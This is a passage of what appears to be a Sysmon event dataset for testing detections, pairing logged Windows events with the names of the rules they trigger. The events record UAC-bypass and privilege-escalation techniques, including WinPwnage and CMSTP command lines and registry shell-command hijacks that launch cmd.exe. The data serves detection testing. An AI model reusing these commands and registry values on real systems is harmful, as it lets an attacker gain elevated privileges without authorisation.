Viewer"],"event":{"Event":{"EventData":{"Details":"c:\\users\\ieuser\\appdata\\local\\temp","EventType":"SetValue","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-6CE5-5CD5-0000-00104BC61B00","ProcessId":4076,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Volatile Environment\\SYSTEMROOT","UtcTime":"2019-05-10 12:21:57.270"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":15635,"Execution_attributes":{"ProcessID":2016,"ThreadID":2012},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-10T12:21:57.286666Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-10 12:06:06.896","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-6CE5-5CD5-0000-00104BC61B00","ProcessId":4076,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\system32\\mmc.exe","UtcTime":"2019-05-10 
12:22:02.434"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15636,"Execution_attributes":{"ProcessID":2016,"ThreadID":2012},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-10T12:22:02.434314Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-03 11:23:15.519","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-6EA3-5D45-0000-0010204DE100","ProcessId":7984,"RuleName":"PrivEsc - UAC Bypass UACME 30","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\wow64log.dll","UtcTime":"2019-08-03 11:23:15.519"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5401,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-03T11:23:15.560614Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event 
Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"365ABB72-9570-5CD3-0000-00103FC90A00","ProcessId":1900,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe\\(Default)","UtcTime":"2019-05-09 03:25:24.552"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":11264,"Execution_attributes":{"ProcessID":1988,"ThreadID":228},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-09T03:25:24.630445Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Sdclt Child Processes"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /name Microsoft.BackupAndRestoreCenter","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\onedrive\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-94CD-5CD3-0000-0020DD3A0100","LogonId":"0x13add","ParentCommandLine":"\"C:\\Windows\\system32\\sdclt.exe\" 
","ParentImage":"C:\\Windows\\System32\\sdclt.exe","ParentProcessGuid":"365ABB72-9DA4-5CD3-0000-00102E692F00","ParentProcessId":3184,"ProcessGuid":"365ABB72-9DA4-5CD3-0000-00107F7A2F00","ProcessId":2920,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-09 03:25:24.677"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":11267,"Execution_attributes":{"ProcessID":1988,"ThreadID":228},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-09T03:25:25.067945Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Tools\\PrivEsc\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-3B92-5EB5-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"c:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-4640-5EB7-0000-0010EF364B01","ParentProcessId":372,"ProcessGuid":"747F3D96-4647-5EB7-0000-0010B3454B01","ProcessId":7672,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"NT 
AUTHORITY\\SYSTEM","UtcTime":"2020-05-10 00:09:43.370"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":112972,"Execution_attributes":{"ProcessID":2728,"ThreadID":3432},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-05-10T00:09:43.372595Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-11 17:28:17.363","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-0631-5CD7-0000-0010C5862100","ProcessId":2460,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\tmp.ini","UtcTime":"2019-05-11 17:28:17.363"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":16037,"Execution_attributes":{"ProcessID":2008,"ThreadID":1992},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-11T17:28:17.363930Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Bypass UAC via CMSTP"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmstp.exe\" /au c:\\users\\ieuser\\appdata\\local\\temp\\tmp.ini","Company":"Microsoft 
Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Microsoft Connection Manager Profile Installer","FileVersion":"7.02.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=7B1FF39621D704665F392CB19171B8337E042D7D,MD5=00263CA2071DC9A6EE577EB356B0D1D9,SHA256=AE11B4CD277731BA5D218A2FDB22D19EA5F2780256BC481E86ACBD8ED4CCF1C4,IMPHASH=152AEE2AB20419D44875B94A2E5E3387","Image":"C:\\Windows\\System32\\cmstp.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-F9CD-5CD6-0000-002065370100","LogonId":"0x13765","ParentCommandLine":"python winpwnage.py -u uac -i 17 -p c:\\windows\\System32\\cmd.exe","ParentImage":"C:\\Python27\\python.exe","ParentProcessGuid":"365ABB72-0631-5CD7-0000-0010C5862100","ParentProcessId":2460,"ProcessGuid":"365ABB72-0633-5CD7-0000-0010C6A02100","ProcessId":3840,"Product":"Microsoft(R) Connection Manager","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-11 17:28:19.442"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16038,"Execution_attributes":{"ProcessID":2008,"ThreadID":1992},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-11T17:28:19.567055Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CMSTP Execution Registry Event"],"event":{"Event":{"EventData":{"Details":"C:\\ProgramData\\Microsoft\\Network\\Connections\\Cm","EventType":"SetValue","Image":"C:\\Windows\\system32\\DllHost.exe","ProcessGuid":"365ABB72-0545-5CD7-0000-001078371F00","ProcessId":3044,"RuleName":"","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\cmmgr32.exe\\ProfileInstallPath","UtcTime":"2019-05-11 
17:28:22.488"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":16039,"Execution_attributes":{"ProcessID":2008,"ThreadID":1992},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-11T17:28:22.598305Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-3384-5EA5-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":596,"ProcessGuid":"747F3D96-B755-5EA4-0000-0010D06E2500","ProcessId":4484,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-04-25 
22:19:01.724"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":27334,"Execution_attributes":{"ProcessID":2752,"ThreadID":3576},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-04-25T22:19:02.057201Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Renamed Binary"],"event":{"Event":{"EventData":{"CommandLine":"c:\\Program Files\\vulnsvc\\mmm.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\program.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-B764-5EA4-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"Cmd.Exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","ParentImage":"C:\\Windows\\System32\\services.exe","ParentProcessGuid":"747F3D96-B764-5EA4-0000-00106F550000","ParentProcessId":584,"ProcessGuid":"747F3D96-B766-5EA4-0000-0010E7880100","ProcessId":2856,"Product":"Microsoft® Windows® Operating System","RuleName":"PrivEsc - Potential Unquoted Service Exploit","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-04-25 
22:19:18.317"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":27636,"Execution_attributes":{"ProcessID":2796,"ThreadID":3572},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-04-25T22:19:28.080717Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-10 13:49:29.789","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-8169-5CD5-0000-0010D7982300","ProcessId":3552,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\NTWDBLIB.dll","UtcTime":"2019-05-10 13:49:29.789"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15706,"Execution_attributes":{"ProcessID":1980,"ThreadID":1948},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-10T13:49:29.789907Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - 
File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-10 13:49:34.899","Image":"C:\\Windows\\System32\\makecab.exe","ProcessGuid":"365ABB72-816E-5CD5-0000-0010FEB62300","ProcessId":1700,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\suspicious.cab","UtcTime":"2019-05-10 13:49:34.899"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15707,"Execution_attributes":{"ProcessID":1980,"ThreadID":1948},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-10T13:49:34.946157Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /groups","Company":"Microsoft Corporation","CurrentDirectory":"C:\\temp\\PowerShell-Suite-master\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-26E1-5CDA-0000-002087350100","LogonId":"0x13587","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-28A0-5CDA-0000-001074181300","ParentProcessId":2016,"ProcessGuid":"365ABB72-28D0-5CDA-0000-00103A6B1300","ProcessId":2676,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-14 
02:32:48.290"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":17715,"Execution_attributes":{"ProcessID":2024,"ThreadID":2004},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-14T02:32:48.290682Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /groups","Company":"Microsoft Corporation","CurrentDirectory":"C:\\temp\\PowerShell-Suite-master\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-26E1-5CDA-0000-002087350100","LogonId":"0x13587","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-28A0-5CDA-0000-001074181300","ParentProcessId":2016,"ProcessGuid":"365ABB72-28D0-5CDA-0000-0010F76F1300","ProcessId":3964,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-14 
02:32:48.342"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":17717,"Execution_attributes":{"ProcessID":2024,"ThreadID":2004},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-14T02:32:48.359432Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-11 16:46:10.344","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-FC52-5CD6-0000-0010357F1200","ProcessId":3812,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\CRYPTBASE.dll","UtcTime":"2019-05-11 16:46:10.344"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15970,"Execution_attributes":{"ProcessID":2008,"ThreadID":1992},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-11T16:46:10.344282Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - 
File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-11 16:46:15.484","Image":"C:\\Windows\\System32\\makecab.exe","ProcessGuid":"365ABB72-FC57-5CD6-0000-00101FAF1200","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\suspicious.cab","UtcTime":"2019-05-11 16:46:15.484"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15972,"Execution_attributes":{"ProcessID":2008,"ThreadID":1992},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-11T16:46:15.547407Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"(Empty)","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-B07F-5D46-0000-001031A90F04","ProcessId":1768,"RuleName":"PrivEsc - UAC bypass UACME-56","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\\DelegateExecute","UtcTime":"2019-08-04 10:16:31.415"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5944,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-04T10:16:31.476803Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus 
Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Windows\\system32\\cmd.exe /c start C:\\Windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-B07F-5D46-0000-0010F1B20F04","ProcessId":2444,"RuleName":"PrivEsc - UAC bypass UACME-56","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\\(Default)","UtcTime":"2019-08-04 10:16:31.572"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5946,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-04T10:16:31.609571Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Wsreset UAC Bypass","Bypass UAC via WSReset.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c start C:\\Windows\\system32\\cmd.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-56A3-5D45-0000-0020B3D31800","LogonId":"0x18d3b3","ParentCommandLine":"\"C:\\Windows\\system32\\WSReset.exe\" 
","ParentImage":"C:\\Windows\\System32\\WSReset.exe","ParentProcessGuid":"747F3D96-B080-5D46-0000-0010D4EA0F04","ParentProcessId":2112,"ProcessGuid":"747F3D96-B091-5D46-0000-001081F71104","ProcessId":820,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-04 10:16:49.960"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5950,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-04T10:16:50.009124Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Windows\\system32\\cmd.exe /c start C:\\Windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-B097-5D46-0000-0010E1321204","ProcessId":1960,"RuleName":"PrivEsc - UAC bypass 